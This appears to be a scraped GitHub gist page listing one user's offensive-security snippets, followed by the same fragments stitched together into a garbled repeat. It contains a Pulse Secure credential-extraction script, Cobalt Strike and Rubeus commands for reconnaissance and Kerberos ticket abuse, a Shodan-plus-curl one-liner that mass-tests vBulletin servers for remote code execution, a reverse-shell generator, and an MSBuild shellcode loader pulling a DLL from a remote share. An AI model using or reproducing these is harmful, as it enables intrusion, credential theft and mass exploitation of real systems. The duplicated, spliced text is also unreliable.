unbaiat unbaiat

## test2.svg

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                unbaiat
                / test2.svg
            
            
              Created
              January 11, 2022 06:29
            
          
      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## test.svg

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                unbaiat
                / test.svg
            
            
              Created
              January 11, 2022 06:27
            
          
      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## yey.php
<?php
/*
	Name : KNOCK KNOCK
	Owner : Naman Sahore
	Email : namansahore@gmail.com
	Published on : 30th July 2017

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

## CVE-2020-8956.ps1
Add-Type -AssemblyName System.Security;

$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
    $ivename = $ive.PSPath.split('\')[-1].ToUpper()
    Write-Host "[+] Checking IVE $($ivename)..."
    $seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
    # 3 possible value names for password
    $encrypted = $ive.Password1
    if(!$encrypted){

## PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

## cobaltstrike_sa.txt
Windows version:
	reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Users who have authed to the system:
	ls C:\Users\

System env variables:
	reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment

Saved outbound RDP connections:

## gist:512f813eafda92406ae753890be43482
##### IF ELEVATED:

# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi

# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter

## vBulletin RCE shodan
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;

## generate-java-reverse-shell-ssl.sh
#!/bin/bash
# This is not great...
#
NAME=Shell
TAC=TrustAllCertificates
LHOST=10.0.0.254
LPORT=4444
COMMAND='"powershell"'

CURDIR=$(pwd)

## msbuild_inline_task_parent_process_spoof.txt
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
            <Target Name="MyTarget">
                <SimpleTask MyProperty="My voice is my passport."
                MyCode='<base64 encoded x64 shellcode>'
		MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
            </Target>
        <UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>
	<?php
	/*
	Name : KNOCK KNOCK
	Owner : Naman Sahore
	Email : namansahore@gmail.com
	Published on : 30th July 2017

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
	Add-Type -AssemblyName System.Security;

	$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\\Software\Pulse Secure\Pulse\User Data\'
	foreach($ive in $ives) {
	$ivename = $ive.PSPath.split('\')[-1].ToUpper()
	Write-Host "[+] Checking IVE $($ivename)..."
	$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
	# 3 possible value names for password
	$encrypted = $ive.Password1
	if(!$encrypted){
	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set
	Windows version:
	reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion

	Users who have authed to the system:
	ls C:\Users\

	System env variables:
	reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment

	Saved outbound RDP connections:
	##### IF ELEVATED:

	# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
	beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

	# decode the base64 blob to a binary .kirbi
	$ base64 -d ticket.b64 > ticket.kirbi

	# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
	beacon> make_token DOMAIN\USER PassWordDoesntMatter
	#!/bin/bash
	# This is not great...
	#
	NAME=Shell
	TAC=TrustAllCertificates
	LHOST=10.0.0.254
	LPORT=4444
	COMMAND='"powershell"'

	CURDIR=$(pwd)
	<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="MyTarget">
	<SimpleTask MyProperty="My voice is my passport."
	MyCode='<base64 encoded x64 shellcode>'
	MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
	</Target>
	<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
	</Project>